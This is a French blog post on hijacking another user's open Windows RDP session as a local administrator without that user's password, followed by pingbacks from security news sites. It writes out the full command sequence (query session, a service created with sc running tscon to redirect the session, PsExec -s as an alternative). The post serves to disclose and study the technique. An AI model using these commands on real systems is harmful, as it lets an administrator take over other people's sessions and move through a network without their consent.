Vol de session RDP

Quand le système à tous les droits, rien ne vas plus…

Vous êtes administrateur d’un serveur (ou vous en avez les droits ;)) et aimeriez récupérer une session RDP déjà ouverte, mal fermé, ou simplement aller voir pourquoi Paintbrush est ouvert sur un serveur ?

rdp_paint

Plusieurs options nous sont ouvertes :

  • Se connecter en RDP sur le serveur et récupérer la session à l’écran d’accueil :

    logon_screen_pwd

    mais il faudra connaître le mot de passe de session pour continuer…

  • Se connecter en RDP avec son compte administrateur (puis tenter une connexion par le gestionnaire de tâches par exemple)

    taskmgr_pwd

    mais il faudra connaître le mot de passe de session pour continuer… (idem via tscon ou le gestionnaire des services Bureau à distance)

  • L’assistance à distance : par défaut, ce n’est pas automatique

    aide_distance

    il fallait régler ces options avant, et elles n’agiront pas sur les sessions courantes :(

Demandons un coup de main au système ?

Le système est notre ami

tscon_service

  1. Récupérons les identifiants de sessions concernés : query session
    C:\Windows\system32>query session
     SESSION           UTILISATEUR              ID  ÉTAT    TYPE        PÉRIPHÉRIQUE
     services                                    0  Déco
     console                                     1  Conn
    >rdp-tcp#1         user1                     2  Actif   rdpwd
     rdp-tcp#0         gentilkiwi                3  Actif   rdpwd
     rdp-tcp                                 65536  Écouter

    rdp-tcp#0 est la session que nous voulons voler, rdp-tcp#1 est notre session ouverte.

  2. Créons rapidement un faux service (qui fera l’affaire) :
    sc create givemerdp binpath= "cmd /k tscon rdp-tcp#0 /dest:rdp-tcp#1" type= own
  3. En le démarrant, le bureau basculera :)
    sc start  givemerdp

    Il peut être supprimé par :

    sc delete givemerdp

Cela peut bien sur être plus propre avec PsExec… (et son argument -s)

Tests que je vous invite à effectuer :

  • Travailler avec des sessions RDP sources inactives ou dont la session Windows n’est pas fermée
  • Travailler avec des sessions RDP cibles pas encore connectés !
  • Utiliser PsExec depuis une invite externe (sans RDP)

31 réflexions sur « Vol de session RDP »

  1. Ping : Feature or flaw? How to hijack a Windows account in less than a minute - InfoSecHotSpot

  2. Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password – AnonymousMedia

  3. Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password | NuclearCoffee

  4. Ping : Local Windows Admins Can Hijack Sessions Without Credentials | Threatpost | The first stop for security news

  5. Ping : Session Hijacking All Windows versions – Tfun

  6. Ping : Local Windows Admins Can Hijack Sessions Without Credentials - InfoSecHotSpot

  7. Ping : Fonction ou faille ? Comment pirater un compte Windows en moins d'une minute - EXTEIN

  8. Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password | CyberInject

  9. Ping : Local Windows Admins Can Hijack Sessions Without Credentials - Help-Software

  10. Ping : Hacker Cracks Home windows Account In under 1 Minutes, Doesn’t Understand If It is A Pester Or Function | ATechpoint

  11. Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password - 95CN Security

  12. Ping : Windows : une (presque) faille de vol de session RDP

  13. Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password - Security Leaks

  14. Ping : Local Windows Admins Can Hijack Sessions Without Credentials - Cyenet Solutions

  15. Ping : Un hacker demuestra lo fácil que es secuestrar una cuenta de Windows | NoticiasDeHacking

  16. Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password - Digital Myth Solutions

  17. Ping : Hacker News: Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password | 1EarthUnited

  18. Ping : Un vieux piratage de session Windows remis au goût du jour - EXTEIN

  19. Ping : Cómo acceder a sesiones de usuarios en Windows sin contraseñas - NeoTeo

  20. Ping : Cómo acceder a sesiones de usuarios en Windows sin contraseñas

  21. Ping : Faille dans Windows: S'introduire dans une session utilisateur sans outils d'attaque | Tech221.net

  22. Ping : Hacker Cracks Windows Account In Less Than 60 Seconds. By-ANKIT SINGH – <HACKER'S BLOG>

  23. Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password | 95CN Security

  24. Ping : 一种会话劫持技术通杀全部Windows版本,但这真的是漏洞吗… - FreeBuf.COM | 关注黑客与极客

  25. Ping : 一种会话劫持技术通杀全部Windows版本,但这真的是漏洞吗… - 莹莹之色

  26. Ping : Session Hijacking without Password on All Windows Versions - The Hackr

  27. Ping : Hacker Cracks Windows Account In Less Than 60 Seconds! - Techie Idiots

  28. Ping : RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation – Hackr Tech

  29. Ping : MOV AX, BX Code depilation salon: Articles, Code samples, Processor code documentation, Low-level programming, Working with debuggers RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation

  30. Ping : Hacker revela la forma más fácil de secuestrar una sesión de usuario de Windows privilegiada sin contraseña

  31. Ping : Un pirate pirate un compte Windows en moins de 60 secondes ! - Fkool

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.